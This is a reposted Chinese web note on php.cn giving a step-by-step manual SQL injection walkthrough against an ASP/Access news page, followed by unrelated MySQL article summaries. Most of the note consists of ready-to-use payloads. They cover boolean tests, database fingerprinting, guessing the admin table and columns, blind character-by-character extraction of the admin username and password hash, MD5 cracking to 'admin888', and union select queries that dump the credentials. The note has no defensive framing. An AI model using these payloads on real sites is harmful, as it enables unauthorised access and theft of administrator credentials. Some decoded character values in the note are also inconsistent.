access手工注入笔记-Mysql Tutorial-php.cn

Home

Database

Mysql Tutorial

access手工注入笔记

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 07, 2016 pm 03:32 PM

accesshttpinjectionnotes

http://www.xxx.com/news.asp?id=6 注入点判断是否存在注入两次返回不一样存在注入 http://www.xxx.com/news.asp?id=6 and 1=1 http://www.xxx.com/news.asp?id=6 and 1=2 判断数据库这里可能是本地问题没有测试出来 and (select count(*) from msys

http://www.xxx.com/news.asp?id=6
注入点

判断是否存在注入两次返回不一样存在注入
http://www.xxx.com/news.asp?id=6 and 1=1

http://www.xxx.com/news.asp?id=6 and 1=2

判断数据库这里可能是本地问题没有测试出来
and (select count(*) from msysobjects)>0 （返回权限不足access数据库）
and (select count(*) from sysobjects)>0 （返回正常则为MSSQL数据库）

猜解表名（正常则存在admin,不正常则不存在）

and exists (select * from admin)

返回正确存在admin 我们随便填写一个进去那么返回错误不存在这个表

现在我们来猜解字段
and exists (select username from admin)

and exists (select password from admin)

没有出错证明这两个字段都是存在不存在的话同上不存在字段

猜解用户名和密码长度

and (select top 1 len(username) from admin)>0
and (select top 1 len(password) from admin)>0

猜解用户名和密码内容：
and(select top 1 asc(mid(username,1,1))from admin)>97
and(select top 1 asc(mid(username,1,1))from admin)=97
and(select top 1 asc(mid(username,2,1))from admin)=100
and(select top 1 asc(mid(username,3,1))from admin)=109
and(select top 1 asc(mid(username,4,1))from admin)=105
and(select top 1 asc(mid(username,5,1))from admin)=110

97 100 109 105 110 admin

------------------------------------------------------
and(select top 1 asc(mid(password,1,1))from admin)=52
and(select top 1 asc(mid(password,2,1))from admin)=54
and(select top 1 asc(mid(password,3,1))from admin)=57
and(select top 1 asc(mid(password,4,1))from admin)=56
and(select top 1 asc(mid(password,5,1))from admin)=48
and(select top 1 asc(mid(password,6,1))from admin)=100
and(select top 1 asc(mid(password,7,1))from admin)=51
and(select top 1 asc(mid(password,8,1))from admin)=50
and(select top 1 asc(mid(password,9,1))from admin)=99
and(select top 1 asc(mid(password,10,1))from admin)=48
and(select top 1 asc(mid(password,11,1))from admin)=53
and(select top 1 asc(mid(password,12,1))from admin)=53
and(select top 1 asc(mid(password,13,1))from admin)=57
and(select top 1 asc(mid(password,14,1))from admin)=102
and(select top 1 asc(mid(password,15,1))from admin)=56
and(select top 1 asc(mid(password,16,1))from admin)=32

52 54 57 101 56 48 100 51 50 99 48 53 53 57 102 56 32
469e80d32c0559f8 md5 解出来的密码是admin888
=====================================================
（二）联合查询暴出管理帐号及密码

先用order by 爆出字段数，然后：

http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from admin

语法:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 表示的是列长度。
from admin 查询对像admin表名

运行后会出现两到三个数字，如：4、12 则修改语句子（即在4、12中修改成列名，红色部份）：
http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,usermane,5,6,7,8,9,10,11,password,13,14,15 from admin

这样，就可以爆出管理帐户和密码了。当然你也可以先爆帐户：

http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,username,5,6,7,8,9,10,11,12,13,14,15 from admin

再爆密码：
http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,password,15 from admin

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Explain the role of InnoDB redo logs and undo logs.Apr 15, 2025 am 12:16 AM

InnoDB uses redologs and undologs to ensure data consistency and reliability. 1.redologs record data page modification to ensure crash recovery and transaction persistence. 2.undologs records the original data value and supports transaction rollback and MVCC.

What are the key metrics to look for in an EXPLAIN output (type, key, rows, Extra)?Apr 15, 2025 am 12:15 AM

Key metrics for EXPLAIN commands include type, key, rows, and Extra. 1) The type reflects the access type of the query. The higher the value, the higher the efficiency, such as const is better than ALL. 2) The key displays the index used, and NULL indicates no index. 3) rows estimates the number of scanned rows, affecting query performance. 4) Extra provides additional information, such as Usingfilesort prompts that it needs to be optimized.

What is the Using temporary status in EXPLAIN and how to avoid it?Apr 15, 2025 am 12:14 AM

Usingtemporary indicates that the need to create temporary tables in MySQL queries, which are commonly found in ORDERBY using DISTINCT, GROUPBY, or non-indexed columns. You can avoid the occurrence of indexes and rewrite queries and improve query performance. Specifically, when Usingtemporary appears in EXPLAIN output, it means that MySQL needs to create temporary tables to handle queries. This usually occurs when: 1) deduplication or grouping when using DISTINCT or GROUPBY; 2) sort when ORDERBY contains non-index columns; 3) use complex subquery or join operations. Optimization methods include: 1) ORDERBY and GROUPB

Describe the different SQL transaction isolation levels (Read Uncommitted, Read Committed, Repeatable Read, Serializable) and their implications in MySQL/InnoDB.Apr 15, 2025 am 12:11 AM

MySQL/InnoDB supports four transaction isolation levels: ReadUncommitted, ReadCommitted, RepeatableRead and Serializable. 1.ReadUncommitted allows reading of uncommitted data, which may cause dirty reading. 2. ReadCommitted avoids dirty reading, but non-repeatable reading may occur. 3.RepeatableRead is the default level, avoiding dirty reading and non-repeatable reading, but phantom reading may occur. 4. Serializable avoids all concurrency problems but reduces concurrency. Choosing the appropriate isolation level requires balancing data consistency and performance requirements.

MySQL vs. Other Databases: Comparing the OptionsApr 15, 2025 am 12:08 AM

MySQL is suitable for web applications and content management systems and is popular for its open source, high performance and ease of use. 1) Compared with PostgreSQL, MySQL performs better in simple queries and high concurrent read operations. 2) Compared with Oracle, MySQL is more popular among small and medium-sized enterprises because of its open source and low cost. 3) Compared with Microsoft SQL Server, MySQL is more suitable for cross-platform applications. 4) Unlike MongoDB, MySQL is more suitable for structured data and transaction processing.

How does MySQL index cardinality affect query performance?Apr 14, 2025 am 12:18 AM

MySQL index cardinality has a significant impact on query performance: 1. High cardinality index can more effectively narrow the data range and improve query efficiency; 2. Low cardinality index may lead to full table scanning and reduce query performance; 3. In joint index, high cardinality sequences should be placed in front to optimize query.

MySQL: Resources and Tutorials for New UsersApr 14, 2025 am 12:16 AM

The MySQL learning path includes basic knowledge, core concepts, usage examples, and optimization techniques. 1) Understand basic concepts such as tables, rows, columns, and SQL queries. 2) Learn the definition, working principles and advantages of MySQL. 3) Master basic CRUD operations and advanced usage, such as indexes and stored procedures. 4) Familiar with common error debugging and performance optimization suggestions, such as rational use of indexes and optimization queries. Through these steps, you will have a full grasp of the use and optimization of MySQL.

Real-World MySQL: Examples and Use CasesApr 14, 2025 am 12:15 AM

MySQL's real-world applications include basic database design and complex query optimization. 1) Basic usage: used to store and manage user data, such as inserting, querying, updating and deleting user information. 2) Advanced usage: Handle complex business logic, such as order and inventory management of e-commerce platforms. 3) Performance optimization: Improve performance by rationally using indexes, partition tables and query caches.

See all articles